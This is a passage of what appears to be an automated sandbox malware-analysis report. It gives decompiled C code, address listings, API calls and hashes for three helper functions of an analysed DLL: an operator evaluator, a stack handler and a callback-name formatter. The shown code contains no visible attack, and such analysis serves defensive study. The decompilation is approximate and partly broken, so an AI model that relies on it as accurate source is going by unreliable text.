73bc1e2a 378->388 379->355 389 73bc1cee-73bc1cf2 379->389 380->355 381->355 382->357 390 73bc1de1 382->390 383->355 391 73bc1d41-73bc1d5a GlobalFree * 2 387->391 388->357 389->355 390->374
                                                            C-Code - Quality: 88%
                                                            			E73BC1C2B(signed int __edx, char _a8, void* _a16) {
				char _v8;
				char _v28;
				void* _v32;
				signed int _v36;
				signed int _v40;
				void* _t28;
				char _t31;
				char _t32;
				signed int _t33;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;
				signed int _t63;
				char _t67;
				signed int _t70;
				signed int _t72;
				void* _t79;
				void* _t81;
				signed int _t83;
				signed int _t86;
				void* _t91;

				_t70 = __edx;
				asm("xorps xmm0, xmm0");
				 *0x73bc5040 = _a8;
				 *0x73bc503c = _a16;
				asm("movlpd [esp+0x10], xmm0");
				_t28 = E73BC152B();
				_push(_t28);
				_v32 = _t28;
				_t72 = E73BC1326();
				_t63 = _t70;
				_t79 = E73BC152B();
				_a16 = _t79;
				_t67 =  *_t79;
				_t31 = _t67;
				_a8 = _t31;
				if(_t67 == 0x7e) {
					L3:
					_t68 = _v36;
					_t83 = _v40;
					L4:
					_t32 = _t31;
					_t91 = _t32 - 0x2f;
					if(_t91 > 0) {
						_t33 = _t32 - 0x3c;
						__eflags = _t33;
						if(_t33 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x3c;
							if( *((char*)(_t79 + 1)) != 0x3c) {
								__eflags = _t63 - _t68;
								if(__eflags > 0) {
									L18:
									asm("xorps xmm0, xmm0");
									asm("movlpd [esp+0x10], xmm0");
									_t72 = _v40;
									_t63 = _v36;
									L19:
									_push( &_v28);
									_push(_t63);
									_push(_t72);
									E73BC144D(_t68);
									E73BC157E( &_v28);
									GlobalFree(_v32);
									return GlobalFree(_t79);
								}
								if(__eflags < 0) {
									L57:
									_t72 = 1;
									_t63 = 0;
									goto L19;
								}
								__eflags = _t72 - _t83;
								if(_t72 >= _t83) {
									goto L18;
								}
								goto L57;
							}
							_t70 = _t63;
							_t68 = _t83;
							_t41 = E73BC3090(_t72, _t83, _t70);
							L53:
							_t72 = _t41;
							_t63 = _t70;
							goto L19;
						}
						_t42 = _t33 - 1;
						__eflags = _t42;
						if(_t42 == 0) {
							__eflags = _t72 - _t83;
							if(_t72 != _t83) {
								goto L18;
							}
							__eflags = _t63 - _t68;
							L22:
							if(__eflags != 0) {
								goto L18;
							}
							goto L57;
						}
						_t43 = _t42 - 1;
						__eflags = _t43;
						if(_t43 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x3e;
							if( *((char*)(_t79 + 1)) != 0x3e) {
								__eflags = _t63 - _t68;
								if(__eflags < 0) {
									goto L18;
								}
								if(__eflags > 0) {
									goto L57;
								}
								__eflags = _t72 - _t83;
								if(_t72 <= _t83) {
									goto L18;
								}
								goto L57;
							}
							__eflags =  *((char*)(_t79 + 2)) - 0x3e;
							_t44 = _t72;
							_t70 = _t63;
							_t68 = _t83;
							if( *((char*)(_t79 + 2)) != 0x3e) {
								_t41 = E73BC30B0(_t44, _t68, _t70);
							} else {
								_t41 = E73BC30E0(_t44, _t68, _t70);
							}
							goto L53;
						}
						_t45 = _t43 - 0x20;
						__eflags = _t45;
						if(_t45 == 0) {
							_t72 = _t72 ^ _t83;
							_t63 = _t63 ^ _t68;
							goto L19;
						}
						_t46 = _t45 - 0x1e;
						__eflags = _t46;
						if(_t46 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x7c;
							if( *((char*)(_t79 + 1)) != 0x7c) {
								_t72 = _t72 | _t83;
								_t63 = _t63 | _t68;
								goto L19;
							}
							__eflags = _t72 | _t63;
							if((_t72 | _t63) != 0) {
								goto L57;
							}
							L17:
							__eflags = _t83 | _t68;
							if((_t83 | _t68) != 0) {
								goto L57;
							}
							goto L18;
						}
						__eflags = _t46 == 0;
						if(_t46 == 0) {
							_t72 =  !_t72;
							_t63 =  !_t63;
						}
						goto L19;
					}
					if(_t91 == 0) {
						L24:
						__eflags = _t83 | _t68;
						if((_t83 | _t68) != 0) {
							_push(_t68);
							_push(_t83);
							_push(_t63);
							_push(_t72);
							_t51 = E73BC2FB0();
							_t86 = _t63;
							_t72 = _t51;
							_t63 = _t70;
						} else {
							asm("xorps xmm0, xmm0");
							_t68 = _t72;
							asm("movlpd [esp+0x10], xmm0");
							_t86 = _t63;
							_t63 = _v36;
							_t72 = _v40;
						}
						__eflags = _v8 - 0x2f;
						if(_v8 != 0x2f) {
							_t72 = _t68;
							_t63 = _t86;
						}
						goto L19;
					}
					_t52 = _t32 - 0x21;
					if(_t52 == 0) {
						__eflags = _t72 | _t63;
						goto L22;
					}
					_t53 = _t52 - 4;
					if(_t53 == 0) {
						goto L24;
					}
					_t54 = _t53 - 1;
					if(_t54 == 0) {
						__eflags =  *((char*)(_t79 + 1)) - 0x26;
						if( *((char*)(_t79 + 1)) != 0x26) {
							_t72 = _t72 & _t83;
							_t63 = _t63 & _t68;
							goto L19;
						}
						__eflags = _t72 | _t63;
						if((_t72 | _t63) == 0) {
							goto L18;
						}
						goto L17;
					}
					_t55 = _t54 - 4;
					if(_t55 == 0) {
						_t41 = E73BC2ED0(_t72, _t63, _t83, _t68);
						goto L53;
					} else {
						_t56 = _t55 - 1;
						if(_t56 == 0) {
							_t72 = _t72 + _t83;
							asm("adc ebx, ecx");
						} else {
							if(_t56 == 0) {
								_t72 = _t72 - _t83;
								asm("sbb ebx, ecx");
							}
						}
						goto L19;
					}
				}
				_a8 = _t67;
				if(_t67 == 0x21) {
					goto L3;
				} else {
					_t81 = E73BC152B();
					_push(_t81);
					_t83 = E73BC1326();
					_v40 = _t70;
					GlobalFree(_t81);
					_t79 = _a16;
					_t68 = _v40;
					_t31 =  *_t79;
					_a8 = _t31;
					goto L4;
				}
			}

































                                                            0x73bc1c2b
                                                            0x73bc1c32
                                                            0x73bc1c38
                                                            0x73bc1c42
                                                            0x73bc1c47
                                                            0x73bc1c4d
                                                            0x73bc1c52
                                                            0x73bc1c53
                                                            0x73bc1c5d
                                                            0x73bc1c5f
                                                            0x73bc1c66
                                                            0x73bc1c68
                                                            0x73bc1c6c
                                                            0x73bc1c6e
                                                            0x73bc1c70
                                                            0x73bc1c77
                                                            0x73bc1cad
                                                            0x73bc1cad
                                                            0x73bc1cb1
                                                            0x73bc1cb5
                                                            0x73bc1cb5
                                                            0x73bc1cb8
                                                            0x73bc1cbb
                                                            0x73bc1da3
                                                            0x73bc1da3
                                                            0x73bc1da6
                                                            0x73bc1e3b
                                                            0x73bc1e3f
                                                            0x73bc1e55
                                                            0x73bc1e57
                                                            0x73bc1d1a
                                                            0x73bc1d1a
                                                            0x73bc1d1d
                                                            0x73bc1d23
                                                            0x73bc1d27
                                                            0x73bc1d2b
                                                            0x73bc1d2f
                                                            0x73bc1d30
                                                            0x73bc1d31
                                                            0x73bc1d32
                                                            0x73bc1d3c
                                                            0x73bc1d4e
                                                            0x73bc1d5a
                                                            0x73bc1d5a
                                                            0x73bc1e5d
                                                            0x73bc1e67
                                                            0x73bc1e69
                                                            0x73bc1e6a
                                                            0x00000000
                                                            0x73bc1e6a
                                                            0x73bc1e5f
                                                            0x73bc1e61
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc1e61
                                                            0x73bc1e43
                                                            0x73bc1e45
                                                            0x73bc1e47
                                                            0x73bc1e4c
                                                            0x73bc1e4c
                                                            0x73bc1e4e
                                                            0x00000000
                                                            0x73bc1e4e
                                                            0x73bc1dac
                                                            0x73bc1dac
                                                            0x73bc1daf
                                                            0x73bc1e2c
                                                            0x73bc1e2e
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc1e34
                                                            0x73bc1d63
                                                            0x73bc1d63
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc1d65
                                                            0x73bc1db1
                                                            0x73bc1db1
                                                            0x73bc1db4
                                                            0x73bc1df8
                                                            0x73bc1dfc
                                                            0x73bc1e18
                                                            0x73bc1e1a
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc1e20
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc1e22
                                                            0x73bc1e24
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc1e2a
                                                            0x73bc1dfe
                                                            0x73bc1e02
                                                            0x73bc1e04
                                                            0x73bc1e06
                                                            0x73bc1e08
                                                            0x73bc1e11
                                                            0x73bc1e0a
                                                            0x73bc1e0a
                                                            0x73bc1e0a
                                                            0x00000000
                                                            0x73bc1e08
                                                            0x73bc1db6
                                                            0x73bc1db6
                                                            0x73bc1db9
                                                            0x73bc1def
                                                            0x73bc1df1
                                                            0x00000000
                                                            0x73bc1df1
                                                            0x73bc1dbb
                                                            0x73bc1dbb
                                                            0x73bc1dbe
                                                            0x73bc1dd3
                                                            0x73bc1dd7
                                                            0x73bc1de6
                                                            0x73bc1de8
                                                            0x00000000
                                                            0x73bc1de8
                                                            0x73bc1dd9
                                                            0x73bc1ddb
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc1d12
                                                            0x73bc1d12
                                                            0x73bc1d14
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc1d14
                                                            0x73bc1dc1
                                                            0x73bc1dc4
                                                            0x73bc1dca
                                                            0x73bc1dcc
                                                            0x73bc1dcc
                                                            0x00000000
                                                            0x73bc1dc4
                                                            0x73bc1cc1
                                                            0x73bc1d6a
                                                            0x73bc1d6c
                                                            0x73bc1d6e
                                                            0x73bc1d87
                                                            0x73bc1d88
                                                            0x73bc1d89
                                                            0x73bc1d8a
                                                            0x73bc1d8b
                                                            0x73bc1d90
                                                            0x73bc1d92
                                                            0x73bc1d94
                                                            0x73bc1d70
                                                            0x73bc1d70
                                                            0x73bc1d73
                                                            0x73bc1d75
                                                            0x73bc1d7b
                                                            0x73bc1d7d
                                                            0x73bc1d81
                                                            0x73bc1d81
                                                            0x73bc1d96
                                                            0x73bc1d9b
                                                            0x73bc1d9d
                                                            0x73bc1d9f
                                                            0x73bc1d9f
                                                            0x00000000
                                                            0x73bc1d9b
                                                            0x73bc1cc7
                                                            0x73bc1cca
                                                            0x73bc1d61
                                                            0x00000000
                                                            0x73bc1d61
                                                            0x73bc1cd0
                                                            0x73bc1cd3
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc1cd9
                                                            0x73bc1cdc
                                                            0x73bc1d08
                                                            0x73bc1d0c
                                                            0x73bc1d5b
                                                            0x73bc1d5d
                                                            0x00000000
                                                            0x73bc1d5d
                                                            0x73bc1d0e
                                                            0x73bc1d10
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc1d10
                                                            0x73bc1cde
                                                            0x73bc1ce1
                                                            0x73bc1cfe
                                                            0x00000000
                                                            0x73bc1ce3
                                                            0x73bc1ce3
                                                            0x73bc1ce6
                                                            0x73bc1cf4
                                                            0x73bc1cf6
                                                            0x73bc1ce8
                                                            0x73bc1cec
                                                            0x73bc1cee
                                                            0x73bc1cf0
                                                            0x73bc1cf0
                                                            0x73bc1cec
                                                            0x00000000
                                                            0x73bc1ce6
                                                            0x73bc1ce1
                                                            0x73bc1c79
                                                            0x73bc1c80
                                                            0x00000000
                                                            0x73bc1c82
                                                            0x73bc1c87
                                                            0x73bc1c89
                                                            0x73bc1c91
                                                            0x73bc1c93
                                                            0x73bc1c97
                                                            0x73bc1c9d
                                                            0x73bc1ca1
                                                            0x73bc1ca5
                                                            0x73bc1ca7
                                                            0x00000000
                                                            0x73bc1ca7

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                            • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: FreeGlobal$__alldvrm
                                                            • String ID: /
                                                            • API String ID: 482422042-2043925204
                                                            • Opcode ID: f355a441d6fc472ed468fe06a739c400010f2ba3ecda5479745834e5e53aab69
                                                            • Instruction ID: b0f2f4227213e0bbbea2a924a66a926f7afdf5c6cd34418173f5c14d812fa91a
                                                            • Opcode Fuzzy Hash: f355a441d6fc472ed468fe06a739c400010f2ba3ecda5479745834e5e53aab69
                                                            • Instruction Fuzzy Hash: 2251F972A083CB5BE332DE75859432A76FAEBCA105F18093DE146F3345E6A5DC458352
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73BC10C6 Relevance: 8.9, APIs: 7, Instructions: 155memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 392 73bc10c6-73bc111a call 73bc152b 396 73bc12a7-73bc12ae GlobalFree 392->396 397 73bc1120 392->397 398 73bc1124-73bc112b 397->398 399 73bc1250-73bc1253 398->399 400 73bc1131 398->400 401 73bc126d-73bc1274 399->401 402 73bc1255-73bc1258 399->402 403 73bc1137-73bc113a 400->403 404 73bc1213-73bc122d 400->404 409 73bc1299-73bc129d 401->409 410 73bc1276-73bc1297 call 73bc12fa GlobalFree 401->410 405 73bc125e-73bc1262 402->405 406 73bc11b8-73bc11d0 call 73bc14e2 call 73bc157e GlobalFree 402->406 407 73bc11d5-73bc120e GlobalAlloc call 73bc12fa 403->407 408 73bc1140-73bc1143 403->408 411 73bc122f-73bc1241 call 73bc12fa 404->411 412 73bc1245-73bc124b GlobalFree 404->412 414 73bc1268 405->414 415 73bc119b-73bc11b3 call 73bc152b call 73bc15c7 GlobalFree 405->415 406->409 433 73bc118c 407->433 408->401 417 73bc1149-73bc114c 408->417 409->398 420 73bc12a3 409->420 410->409 411->412 413 73bc118f-73bc1193 412->413 413->409 414->401 415->413 423 73bc114e-73bc1152 417->423 424 73bc11b5 417->424 420->396 431 73bc1198 423->431 432 73bc1154-73bc1157 423->432 424->406 431->415 432->409 436 73bc115d-73bc1186 GlobalAlloc call 73bc12fa 432->436 433->413 436->433
                                                            C-Code - Quality: 100%
                                                            			E73BC10C6(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				signed int _v0;
				void _t29;
				void* _t30;
				void* _t36;
				void* _t43;
				intOrPtr _t52;
				void* _t56;
				void* _t62;
				void* _t63;
				void _t66;
				void* _t67;
				void* _t74;
				signed int _t75;
				void* _t79;
				void* _t80;
				void* _t82;
				signed int _t83;
				void* _t85;
				void _t88;
				void _t89;
				void* _t90;
				void* _t92;
				void* _t94;

				 *0x73bc5040 = _a8;
				 *0x73bc503c = _a16;
				 *0x73bc5038 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73bc5014, E73BC12F7, _t79, _t82);
				_t83 =  *0x73bc5040 * 0x14;
				_v0 = _t83;
				_t90 = E73BC152B();
				_a8 = _t90;
				_t80 = _t90;
				_t66 = _v0;
				if(_t66 == 0) {
					L28:
					return GlobalFree(_t90);
				}
				do {
					_t29 = _t66;
					_t80 = _t80 + 1;
					_t94 = _t29 - 0x66;
					if(_t94 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L24:
							_t31 =  *0x73bc5010;
							if( *0x73bc5010 != 0) {
								E73BC12FA( *0x73bc5038, _t31 + 4, _t83);
								_t67 =  *0x73bc5010;
								_t92 = _t92 + 0xc;
								 *0x73bc5010 =  *_t67;
								GlobalFree(_t67);
							}
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L15:
							GlobalFree(E73BC157E(E73BC14E2( *_t80 - 0x30)));
							_t80 = _t80 + 1;
							goto L26;
						}
						_t43 = _t36;
						if(_t43 == 0) {
							L13:
							GlobalFree(E73BC15C7( *_t80 - 0x30, E73BC152B()));
							_t80 = _t80 + 1;
							L11:
							_t83 = _v0;
							goto L26;
						}
						L8:
						if(_t43 != 1) {
							goto L26;
						}
						_t88 = GlobalAlloc(0x40, _t83 + 4);
						_t11 = _t88 + 4; // 0x4
						E73BC12FA(_t11,  *0x73bc5038, _v0);
						 *_t88 =  *0x73bc5010;
						 *0x73bc5010 = _t88;
						L10:
						_t92 = _t92 + 0xc;
						goto L11;
					}
					if(_t94 == 0) {
						_t74 =  *0x73bc503c;
						_t85 =  *_t74;
						 *_t74 =  *_t85;
						_t75 = _v0;
						_t52 =  *((intOrPtr*)(_t75 + 0xc));
						_a12 = _t52;
						if( *((char*)(_t85 + 4)) == 0x1e) {
							E73BC12FA(_t75, _t85 + 6, 0x38);
							_t75 = _v0;
							_t92 = _t92 + 0xc;
							_t52 = _a12;
						}
						 *((intOrPtr*)(_t75 + 0xc)) = _t52;
						GlobalFree(_t85);
						goto L11;
					}
					_t56 = _t29 - 0x46;
					if(_t56 == 0) {
						_t89 = GlobalAlloc(0x40,  *0x73bc5040 + 8);
						 *((intOrPtr*)(_t89 + 4)) = 0x1e;
						_t14 = _t89 + 6; // 0x6
						E73BC12FA(_t14, _v0, 0x38);
						 *_t89 =  *( *0x73bc503c);
						 *( *0x73bc503c) = _t89;
						goto L10;
					}
					_t62 = _t56 - 6;
					if(_t62 == 0) {
						goto L24;
					}
					_t63 = _t62 - 4;
					if(_t63 == 0) {
						 *_t80 =  *_t80 + 0xa;
						goto L15;
					}
					_t43 = _t63;
					if(_t43 == 0) {
						 *_t80 =  *_t80 + 0xa;
						goto L13;
					}
					goto L8;
					L26:
					_t66 =  *_t80;
				} while (_t66 != 0);
				_t90 = _a8;
				goto L28;
			}


























                                                            0x73bc10cc
                                                            0x73bc10d6
                                                            0x73bc10e0
                                                            0x73bc10f4
                                                            0x73bc10f7
                                                            0x73bc10fe
                                                            0x73bc110d
                                                            0x73bc110f
                                                            0x73bc1113
                                                            0x73bc1115
                                                            0x73bc111a
                                                            0x73bc12a7
                                                            0x73bc12ae
                                                            0x73bc12ae
                                                            0x73bc1124
                                                            0x73bc1124
                                                            0x73bc1127
                                                            0x73bc1128
                                                            0x73bc112b
                                                            0x73bc1250
                                                            0x73bc1253
                                                            0x73bc126d
                                                            0x73bc126d
                                                            0x73bc1274
                                                            0x73bc1281
                                                            0x73bc1286
                                                            0x73bc128c
                                                            0x73bc1292
                                                            0x73bc1297
                                                            0x73bc1297
                                                            0x00000000
                                                            0x73bc1274
                                                            0x73bc1255
                                                            0x73bc1258
                                                            0x73bc11b8
                                                            0x73bc11cd
                                                            0x73bc11cf
                                                            0x00000000
                                                            0x73bc11cf
                                                            0x73bc125f
                                                            0x73bc1262
                                                            0x73bc119b
                                                            0x73bc11b0
                                                            0x73bc11b2
                                                            0x73bc118f
                                                            0x73bc118f
                                                            0x00000000
                                                            0x73bc118f
                                                            0x73bc1154
                                                            0x73bc1157
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc116d
                                                            0x73bc1175
                                                            0x73bc1179
                                                            0x73bc1184
                                                            0x73bc1186
                                                            0x73bc118c
                                                            0x73bc118c
                                                            0x00000000
                                                            0x73bc118c
                                                            0x73bc1131
                                                            0x73bc1213
                                                            0x73bc1219
                                                            0x73bc121d
                                                            0x73bc1223
                                                            0x73bc1226
                                                            0x73bc1229
                                                            0x73bc122d
                                                            0x73bc1236
                                                            0x73bc123b
                                                            0x73bc123e
                                                            0x73bc1241
                                                            0x73bc1241
                                                            0x73bc1246
                                                            0x73bc1249
                                                            0x00000000
                                                            0x73bc1249
                                                            0x73bc1137
                                                            0x73bc113a
                                                            0x73bc11e6
                                                            0x73bc11ea
                                                            0x73bc11f1
                                                            0x73bc11f8
                                                            0x73bc1205
                                                            0x73bc120c
                                                            0x00000000
                                                            0x73bc120c
                                                            0x73bc1140
                                                            0x73bc1143
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc1149
                                                            0x73bc114c
                                                            0x73bc11b5
                                                            0x00000000
                                                            0x73bc11b5
                                                            0x73bc114f
                                                            0x73bc1152
                                                            0x73bc1198
                                                            0x00000000
                                                            0x73bc1198
                                                            0x00000000
                                                            0x73bc1299
                                                            0x73bc1299
                                                            0x73bc129b
                                                            0x73bc12a3
                                                            0x00000000

                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73BC1163
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC11B0
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC11CD
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73BC11E0
                                                            • GlobalFree.KERNEL32 ref: 73BC1249
                                                            • GlobalFree.KERNEL32(?), ref: 73BC1297
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC12A8
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                            • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: c5336fc34cc79e1b83f6d8d1019a6cbdf0ff1700e1e27f4bd111f31ce7fde082
                                                            • Instruction ID: 09816210fb1b3344abc71454bfa3be6ea8ffde023208580cff9244a869fd1098
                                                            • Opcode Fuzzy Hash: c5336fc34cc79e1b83f6d8d1019a6cbdf0ff1700e1e27f4bd111f31ce7fde082
                                                            • Instruction Fuzzy Hash: F451A2F65043819FE331DF6AC990B267BF8FF89204F14442AE48AEB650E735E900CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73BC1E71 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 28stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 440 73bc1e71-73bc1e7c 441 73bc1e7e-73bc1e8e 440->441 442 73bc1eaf-73bc1ec4 lstrcpyA 440->442 443 73bc1e99-73bc1ead wsprintfA 441->443 444 73bc1e90-73bc1e96 441->444 445 73bc1eca-73bc1ecd 442->445 443->445 444->443
                                                            C-Code - Quality: 100%
                                                            			E73BC1E71(intOrPtr _a4, CHAR* _a8) {
				intOrPtr _t11;
				intOrPtr _t19;
				CHAR* _t21;

				_t11 = _a4;
				if( *((intOrPtr*)(_t11 + 4)) != 1) {
					_t21 = _a8;
					_t13 =  ==  ? 0x73bc40c4 : 0x73bc40bc;
					lstrcpyA(_t21,  ==  ? 0x73bc40c4 : 0x73bc40bc);
				} else {
					_t19 =  *((intOrPtr*)(_t11 + 0x1498));
					if(( *(_t11 + 0x810) & 0x00000100) != 0) {
						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x80c)) + 1));
					}
					_t21 = _a8;
					wsprintfA(_t21, "callback%d", _t19);
				}
				return _t21;
			}






                                                            0x73bc1e71
                                                            0x73bc1e7c
                                                            0x73bc1eaf
                                                            0x73bc1ebf
                                                            0x73bc1ec4
                                                            0x73bc1e7e
                                                            0x73bc1e88
                                                            0x73bc1e8e
                                                            0x73bc1e96
                                                            0x73bc1e96
                                                            0x73bc1e99
                                                            0x73bc1ea4
                                                            0x73bc1eaa
                                                            0x73bc1ecd

                                                            APIs
                                                            • wsprintfA.USER32 ref: 73BC1EA4
                                                            • lstrcpyA.KERNEL32(?,error,00000818,73BC16E5,00000000,?), ref: 73BC1EC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                            • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: lstrcpywsprintf
                                                            • String ID: callback%d$error
                                                            • API String ID: 2408954437-1307476583
                                                            • Opcode ID: 075da5756ebda2517b4b103fe84c2b377b90dc27c668a32db97c85155c3466ca
                                                            • Instruction ID: fb70a9d7f041dc2ad2b0021773105078955b24a7e9262834c8d5dafe761650f0
                                                            • Opcode Fuzzy Hash: 075da5756ebda2517b4b103fe84c2b377b90dc27c668a32db97c85155c3466ca
                                                            • Instruction Fuzzy Hash: F4F034312041649FC7269B049958BBA73EAEF89300F0988A8F88A9B241C770ED009B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%